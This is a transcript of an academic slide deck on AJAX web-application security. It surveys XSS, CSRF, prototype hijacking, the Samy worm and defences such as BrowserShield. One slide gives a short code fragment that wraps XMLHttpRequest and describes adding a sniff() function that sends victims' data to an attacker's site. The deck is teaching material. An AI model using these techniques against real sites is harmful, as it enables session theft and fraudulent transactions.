ajax security issues

25
AJAX Security Issues Kim Giglia CSC 682

Upload: ulani

Post on 19-Jan-2016

43 views

Category:

Documents


0 download

DESCRIPTION

AJAX Security Issues. Kim Giglia CSC 682. Asynchronous JavaScript And XML (AJAX). Not a new technology – a synergy of existing technologies JavaScript DOM (Document Object Model) XML, JSON and XSLT DHTML, XHTML, and CSS XHR (XMLHttpRequest) Object. Traditional Web Application. - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: AJAX Security Issues

AJAX Security Issues

Kim Giglia

CSC 682

Page 2: AJAX Security Issues

Asynchronous JavaScript And XML (AJAX)

Not a new technology – a synergy of existing technologies

•JavaScript

•DOM (Document Object Model)

•XML, JSON and XSLT

•DHTML, XHTML, and CSS

•XHR (XMLHttpRequest) Object

Page 3: AJAX Security Issues

Traditional Web Application

Page 4: AJAX Security Issues

AJAX Web Application

Page 5: AJAX Security Issues

Security Issues – General•Ajax applications are more complex

•Hard to find knowledgeable developers

•More LOC and varied parts

•Ajax applications are transparent

•Messages between the client/server intercepted and

understood (HTTP)

•Application is accessible to anyone

•Some application logic stored on client

Page 6: AJAX Security Issues

Specific Security Issues•XSS and CSRF

•XML poisoning

•Malicious Ajax Code Injection

•RSS/Atom Injection

•WSDL scanning and enumeration

•Client Side validation routines

•Web Services Routing Issues

Page 7: AJAX Security Issues

Specific Security Issues•Parameter manipulation with SOAP

•XPATH injection

•RIA client binary manipulation

•XSS Prototype Hijacking

•HTTP Request Splitting

•Mashup site security problems

•Aggregate or Ajax portal site problems

•Race Conditions

Page 8: AJAX Security Issues

Why do issues arise?

•Tight deadlines

•Limited opportunity for training

•Predeveloped frameworks

Page 9: AJAX Security Issues

Specific Attacks IllustratedMalicious Ajax Code Injection – Theoretical Attack•Hacker in a place with wireless connection

•Travel Agency site – HighTechVacations.net

•Agency has coupon array and crypto functions on client-side – oops!

•Agency doesn’t validate all client-side input for queries and uses client-side data transformation– oops!

•Agency stores both user and admin functions in a common.js file including – AjaxCalls.admin.addUser – oops!

Page 10: AJAX Security Issues

Specific Attacks IllustratedXSS and CSRF – Theoretical Attack•Hacker in a place with wireless find bank.com with an XSS vulnerability

•Hacker crafts a URL pointing to real bank.com site, but contains a JavaScript payload in the query string

•Hacker e-mails link to bank.com customers and asks them to come check out new website

•User follows link and logs in – Hacker now has id and password

•JavaScript load now uses XHR object to request account balance

Page 11: AJAX Security Issues

Specific Attacks IllustratedXSS and CSRF – Theoretical Attack•After account balance extracted XHR object is used to request transfer of funds

•Bank requires confirmation of transfer – XHR object extracts out randomized token (nonce) and returns a confirmation – funds transfer

•Remember user never sees any activity as DOM is not updated

•This type of CSRF not possible before Ajax, because attacker could not extract response from XHR object – only blind attacks were possible

Page 12: AJAX Security Issues

Specific Attacks IllustratedXSS and CSRF – Real Attack

Samy worm on myspace.com•Inserted JavaScript into his profile

•Worm re-directs browser to view from www.myspace.com instead of profile.myspace.com

•Uses XHR obj to retrieve and modify friendslist and user profile

•Site asks for confirmation of profile update – XHR object used to extract token and confirm

Page 13: AJAX Security Issues

Specific Attacks IllustratedXSS Prototype Hijacking•Wrapper function for XHR object

var xmlhttp = XMLHttpRequest;

XMLHttpRequest = function( ) { this.xml = new xmlhttp(); return this; }

•Now attacker has access to control the xml attribute

•Attacker sets up sniff() function which will be used to send the victim’s data to attacker’s site

•Finally attacker wraps XHR send() function to include the sniff() function and maybe even tamper with parameters sent to real site

Page 14: AJAX Security Issues

Specific Attacks IllustratedAggregate Sites

Page 15: AJAX Security Issues

Specific Attacks IllustratedAggregate Sites•Data aggregated from multiple untrustworthy sites

•Everything running in same security domain

•IFrame jails can be used, but those can still be compromised by adding a new iframe inside one jail to point to another iframe outside of the jail.

•NetVibes.com specifically allows widgets to make POSTs to /save/userData.php – so unless you extend iframe jails to server – no protection

•Session hijacking if iframe jails can access session ID

Page 17: AJAX Security Issues

Not an attack – still a problemRace conditions•Alice banks has direct deposit and banks online

•Alice transfers $2k from savings to checking online

•Simultaneously her direct deposit of $10k is occurring

•Before transfer and direct deposit her checking acct bal was $2k

•After both execute her checking acct bal is $4k – what?!@%&?

•A race condition has occurred and only the $2k transfer updated – the web app developers failed to account for race conditions with other processes

Page 18: AJAX Security Issues

Solutions to Security IssuesGeneral recommendations•Developer training and secure coding practices

•Specifically validate all data input

•Get a corporate management buy-in to foster a secure development environment

Page 19: AJAX Security Issues

Solutions to Security IssuesSpecific solutions•Code migration framework to Ajax

•Develop in Java –

•Access to strong IDE

•Developers more familiar than JavaScript

•Use static/dynamic analysis to catch vulnerabilities

•Use XMLVM and XSL style sheet mappings to automatically convert to JavaScript

•Prototype program was developed to test feasibility

•This approach cannot support multi-threaded apps

Page 20: AJAX Security Issues

Solutions to Security IssuesSpecific solutions•Automatic Partitioning

•Code in Jif 3.0

•Developer focused on one language

•Jif code compiled into WebIL

•Separates code into 2 programs – client and server according to security constraints

•Compile both programs into Java

•Use GWT to transform client-side into JavaScript

•Six small prototype apps tested – no real world apps tested

•Labels require getting used to

Page 21: AJAX Security Issues

Solutions to Security IssuesSpecific solutions•Construction frameworks to protect against injection

•Extension of same origin policy

•Identify every UI widget as a principal

•Sandbox the principal w.r. to JavaScript

•Modify browser to collect list of principals as it walks DOM tree

•Modify development framework to attach principal annotations when HTML generated

•Problems handling UI’s dependent upon other UI’s

•No testing submitted by authors

Page 22: AJAX Security Issues

Solutions to Security IssuesSpecific solutions•BrowserShield

•Re-write web pages to filter for malicious content

•THTML

•Tokenizes HTML-modifies per sec policies

•Tags script elements w/ bshield.translate()

•TSCRIPT

•Re-writes all JavaScript at runtime per policies and feeds through Interposition Layer

•Interposition Layer controls all DOM manipulations

Page 23: AJAX Security Issues

Solutions to Security IssuesSpecific solutions

Page 24: AJAX Security Issues

Solutions to Security IssuesSpecific solutions•BrowserShield

•Authors built a prototype and tested against all critical vulnerabilities for which IE released patches in 2005

•12 vulnerabilities related to HTML, script, and ActiveX – 100% caught by BrowserShield

Page 25: AJAX Security Issues

Conclusions•Developing secure Ajax applications is a work in progress

•Continued developer education and awareness is needed

•Some changes in corporate culture may have to happen

•If Ajax applications are developed willy-nilly and people are attacked – they may decide to stop using the web – this could stifle certain industries

•Above all – developers should scrub data inputs